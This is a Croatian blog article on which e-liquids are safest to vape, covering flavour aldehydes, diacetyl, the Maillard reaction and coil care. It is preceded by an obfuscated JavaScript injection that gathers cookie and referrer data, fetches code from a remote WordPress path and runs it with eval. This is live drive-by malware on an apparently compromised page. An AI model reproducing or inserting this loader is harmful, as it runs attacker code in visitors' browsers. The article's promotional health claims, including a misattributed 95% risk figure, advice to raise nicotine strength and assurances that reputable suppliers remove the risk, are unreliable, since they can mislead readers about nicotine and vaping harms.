;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kakve e-tekućine su najsigurnije za parenje?

Prebacili ste se na e-cigarete ili razmišljate o prebacivanju, ostavljajući klasične cigarete iza sebe? Donijeli ste pravu odluku! Smanjit ćete rizike općenito povezane s pušenjem za otprilike 95% prema Ministarstvu zdravlja Ujedinjenog Kraljevstva. Međutim, kako biste još više optimizirali ovu dobrobit za svoje zdravlje, morat ćete pravilno koristiti svoju e-cigaretu i odabrati e-tekućine proizvedene u skladu s profesionalnim standardima. U nastavku ćete pronaći nekoliko savjeta kako napraviti pravi izbor.

Pođimo od aroma

Iako je sastav tekućina za e-cigarete dobro poznat i relativno dobro kontroliran od strane proizvođača diljem svijeta, ostaju određene nesigurnosti u pogledu okusa koji se koriste u formulama. Doista, ove prehrambene arome se rutinski koriste u prerađenoj hrani, ali njihova upotreba za inhalaciju u vapingu i dalje postavlja mnoga pitanja, s obzirom na to da ljudski dišni putovi nemaju iste prirodne barijere kao probavni trakt.

Kada se te arome zagrijavaju, mogu na primjer proizvesti aldehide, hlapljive organske spojeve dobivene toplinskom razgradnjom. Prisutnost aldehida u parama e-cigareta nije ništa novo, a općenito promatrani sadržaji ostaju ispod standarda maksimalne izloženosti primjenjivih na radnim mjestima. Nadalje, duhanski dim sadrži tisuće spojeva opasnih po zdravlje u usporedbi s tek nekoliko, u vrlo niskim koncentracijama, u parama. S druge strane, studije e-cigareta počinju identificirati neke čimbenike koje je lako kontrolirati u sastavima e-tekućina, kako bi se dodatno smanjio rizik koji predstavlja vaping u usporedbi s duhanom, a selektivni izbor okusa je jedan od njih.

Neka istraživanja, od kojih su nesumnjivo najpoznatija ona Macieja Goniewicza s Instituta za rak Roswell Park u Buffalu (Sjedinjene Američke Države), istaknula su neke okuse koji bi mogli doprinijeti proizvodnji aldehida. Na primjer, okusi jagode mogu biti potencijalni izvor benzaldehida u e-tekućini i parama. Slično, neke gurmanske e-tekućine često koriste diacetil kako bi dale okus maslaca. Ova vrsta sastojka potencijalno je štetna za tijelo ako izloženost i trajanje prelaze određene razine. Na našu sreću, općenito promatrane koncentracije ne bi trebale predstavljati neposrednu zdravstvenu opasnost, ali ako ste vaper, naravno trebate obratiti pozornost.

Sada kada znamo sve ovo, treba naglasiti da provjereni proizvođači aroma za e-tekućine itekako obraćaju pažnju na ove detalje te ukoliko svoje arome i/ili e-tekućine nabavljate od pouzdanih izvora, ne morate brinuti jer niti jednog od potencijalno opasnih štetnih spojeva neće biti u toj mjeri da ga vaše tijelo zapravo osjeti.

Maillardova reakcija

Kao opće pravilo, morate razumjeti Maillardovu reakciju da biste shvatili ova pitanja povezana sa sastavom e-tekućine. Ova interakcija koja se odvija kod određene temperature (između 0 i 150°C) između aminokiselina i šećera prisutnih u hrani (ili e-tekućinama u našem slučaju) proizvodi složene kemijske mehanizme koji mogu uzrokovati stvaranje aldehida ili furana.

Maillardova reakcija može biti jasno vidljiva golim okom kada je vaš grijač začepljen, na primjer. S druge strane, kod hrane je ovo ponekad poželjno jer stvara bogatiji okus, ali u smislu vapinga, iskustvo bi moglo biti vrlo različito. Izraz “gunk coil” koji se koristi u svijetu vapinga, što zapravo znači karamelizirana zavojnica, mogao bi biti dobra ilustracija ovog fenomena dobro poznatog vaperima koji ih često tjera da mijenjaju svoje grijače.

Vrlo slatke gurmanske e-tekućine ili one koje oponašaju okus duhana, poznate su po tome da brže prljaju grijač. Aditivi ili pojačivači okusa (sukraloza, etil-maltol, vanilin, mononatrijev glutamat, jabučna kiselina, itd.) potencijalno prisutni u nekim proizvedenim e-tekućinama ili kao sastojci koji se prodaju zasebno za proizvodnju DIY tekućina također bi mogli potaknuti ovu Maillardovu reakciju i učiniti opći sastav e-tekućine složeniji.

Dakle, iako “vapologija” ima određenu distancu u ovom području i neizvjesnost ostaje, svejedno je nadohvat ruke da se ova pitanja povezana s okusima u e-tekućinama riješe kako bi mogli pariti na najsigurniji mogući način.

Ipak, na temelju našeg iskustva, mogu se uspostaviti neka načela. Željeli bismo naglasiti da su ove informacije neformalne, te ni na koji način ne predstavljaju mišljenje zdravstvenog djelatnika, kemičara ili stručnog stručnjaka za e-tekućine. Ipak, u nastavku ćete pronaći naše najosnovnije savjete.

Načela predostrožnosti za odabir vaše e-tekućine

Opća načela predostrožnosti

  • Nikada nemojte pariti ako vam je zaliha e-tekućine pri kraju kako biste spriječili “suhi udarac” (dry hit).
  • Promatrajte postavke koje je naveo proizvođač ako se vaš uređaj može konfigurirati (Mod) i prilagodite vrijednost otpora tim postavkama (ohm).
  • Poželjnije je povećati sadržaj nikotina kako biste manje parili, nego ga smanjili i povećali potrošnju e-tekućine kako biste to nadoknadili.
  • Udisanje izravno u pluća (DTL) i ono što zovemo „cloud chasing“ zahtijevaju veliku potrošnju e-tekućine. Pažljivo birajte tekućine naročito ako ih koristite u ovako velikim količinama.

Načela predostrožnosti specifična za e-tekućine

  • Odlučite se za e-tekućine koje proizvode tvrtke s visokokvalificiranim internim osobljem
  • Neki proizvodni standardi, uključujući poznati francuski Afnor standard, daju nezanemarivo jamstvo sigurnosti za potrošača.
  • Što je veći sadržaj arome e-tekućine, veća je vjerojatnost da će se kemijske reakcije umnožavati na visokim temperaturama.
  • Slatka e-tekućina će vjerojatnije karamelizirati zavojnicu, a time i potaknuti potencijalnu proizvodnju hlapljivih organskih spojeva.
  • Često mijenjajte zavojnicu (barem svaka dva tjedna u slučaju svakodnevne upotrebe), osobito kada se promijenio okus vaše e-tekućine.
  • Ako pravite vlastitu e-tekućinu (uradi sam), pokušajte svesti na minimum koncentraciju okusa i aditiva poput boja i sličnog.

Prava e-tekućina

Nadamo se da su vam ove informacije pomogle boljem razumijevanju složenog, ali ipak važnog pitanja izbora e-tekućine. Imajte na umu da e-cigarete pušačima nude vrlo značajno smanjenje rizika povezanih s pušenjem, a ako ste vaper početnik i uspjeli ste se odreći cigareta zahvaljujući vapingu, možete biti vrlo ponosni na sebe.

Prava e-tekućina, bez obzira na sastav, e-tekućina je koja vam pomaže da zaboravite duhanske cigarete.

Choose your Reaction!
Leave a Comment